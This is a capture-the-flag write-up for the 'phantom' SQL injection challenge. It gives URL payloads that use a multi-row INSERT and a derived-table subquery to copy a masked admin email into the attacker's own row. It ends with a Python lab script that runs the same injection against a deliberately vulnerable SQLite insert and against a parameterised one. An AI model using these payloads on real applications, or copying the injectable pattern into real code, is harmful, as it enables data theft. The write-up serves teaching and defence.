
phantom

[Screenshot 1]

We are provided with the SQL query:

INSERT INTO prob_phantom VALUES(0,'{$_SERVER[REMOTE_ADDR]}','{$_GET[joinmail]}')

This time the query inserts a new row built from the parameter value we provide, rather than selecting one. For the row where no=1, the email is shown masked as **************.

To solve this challenge we need to insert several records with a single statement. MySQL allows this by listing several parenthesised row tuples after VALUES, separated by commas, as follows:

INSERT INTO [table_name] VALUES(1, 1, 1), (2, 2, 2), (3, 3, 3);

If we provide the following URI parameter:

?joinmail=test'), (0, '[Public IP address]', (SELECT 1 WHERE 1=1)) -- -

You can find your public IP address with any online IP lookup service.

The resultant query becomes:

INSERT INTO prob_phantom VALUES(0,'{$_SERVER[REMOTE_ADDR]}','test'), (0, '[Public IP address]', (SELECT 1 WHERE 1=1)) -- -')

[Screenshot 2]

As we can see, the two records have been inserted into the table.

To retrieve the email, however, we have to store it in a variable first (a derived table, in MySQL terms), because MySQL refuses a subquery that reads directly from the table the INSERT is targeting. In order to

Storing the value in a variable

SELECT * FROM (SELECT email FROM prob_phantom WHERE no=1) AS temp

In this example the inner query's result is exposed as the derived table temp, which is what we call the variable here. Without this wrapping, MySQL rejects the subquery with "You can't specify target table 'prob_phantom' for update in FROM clause"; selecting from the derived table instead sidesteps that restriction.

If we provide the following URI parameter:

?joinmail=test'), (0, '[Public IP address]', (SELECT * FROM (SELECT email FROM prob_phantom WHERE no=1) AS temp)) -- -

The resultant query becomes:

INSERT INTO prob_phantom VALUES(0,'{$_SERVER[REMOTE_ADDR]}','test'), (0, '[Public IP address]', (SELECT * FROM (SELECT email FROM prob_phantom WHERE no=1) AS temp)) -- -')

The above query will store

[Screenshot 3]

admin_secure_email@rubiya.kr

If we provide the following URI parameter:

?email=admin_secure_email@rubiya.kr

The resultant query becomes:

SELECT email FROM prob_phantom WHERE no=1 AND email='admin_secure_email@rubiya.kr'

[Screenshot 4]
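As an added example, not part of the original writeup or the challenge's own code, the following Python script rebuilds the challenge's INSERT pattern against an in-memory SQLite table and runs it beside a parameterised version. It covers both steps of the writeup: the multi-row VALUES trick and the derived-table subquery. The table layout (columns no, ip, email), the seeded admin row and the 198.51.100.7 address standing in for "[Public IP address]" are assumptions constructed for the lab; SQLite accepts the same multi-row VALUES syntax, scalar subquery and "-- " comment as MySQL, so the statement behaves the same way here.

```python
import sqlite3

# Constructed lab stand-in for the challenge table; the column names
# (no, ip, email) are an assumption taken from the writeup. "no" is
# quoted in the DDL because NO is an SQL keyword (SQLite also accepts
# it bare, as the payload uses it).
SCHEMA = 'CREATE TABLE prob_phantom ("no" INTEGER, ip TEXT, email TEXT)'
ADMIN_EMAIL = "admin_secure_email@rubiya.kr"

# Documentation-range address (RFC 5737) standing in for "[Public IP address]".
ATTACKER_IP = "198.51.100.7"

# The writeup's joinmail parameter: closes the current row, appends a
# second row whose email column is a scalar subquery on the masked admin
# row, then comments out the trailing "')" of the original statement.
PAYLOAD = (
    f"test'), (0, '{ATTACKER_IP}', "
    "(SELECT * FROM (SELECT email FROM prob_phantom WHERE no=1) AS temp)) -- -"
)


def fresh_db():
    """In-memory database seeded with the masked admin row (no=1)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.execute("INSERT INTO prob_phantom VALUES (1, '127.0.0.1', ?)", (ADMIN_EMAIL,))
    return conn


def insert_vulnerable(conn, remote_addr, joinmail):
    """The challenge's pattern: untrusted input spliced into the SQL text.
    Returns how many rows the single statement actually inserted."""
    sql = f"INSERT INTO prob_phantom VALUES(0,'{remote_addr}','{joinmail}')"
    return conn.execute(sql).rowcount


def insert_safe(conn, remote_addr, joinmail):
    """Hardened form: bound parameters, so quotes, parentheses and comment
    markers inside joinmail are stored as text and cannot alter the statement."""
    cur = conn.execute("INSERT INTO prob_phantom VALUES (0, ?, ?)", (remote_addr, joinmail))
    return cur.rowcount


def rows_for_ip(conn, ip):
    """(no, email) pairs recorded for an address, in insertion order."""
    cur = conn.execute(
        'SELECT "no", email FROM prob_phantom WHERE ip = ? ORDER BY rowid', (ip,)
    )
    return cur.fetchall()


if __name__ == "__main__":
    vuln = fresh_db()
    print("vulnerable: rows inserted =", insert_vulnerable(vuln, "127.0.0.1", PAYLOAD))
    print("vulnerable: rows for attacker IP =", rows_for_ip(vuln, ATTACKER_IP))

    safe = fresh_db()
    print("parameterised: rows inserted =", insert_safe(safe, "127.0.0.1", PAYLOAD))
    print("parameterised: rows for attacker IP =", rows_for_ip(safe, ATTACKER_IP))
```

With the interpolated statement the injected parameter yields two inserted rows, the second of which carries the admin email under the attacker's address; with bound parameters the same input produces exactly one row whose email column holds the payload string verbatim. For a registration handler that is meant to insert one row, a rowcount other than 1, or a freshly inserted email that matches an existing user's masked address, is the anomaly worth alerting on; the parameterised query removes the cause.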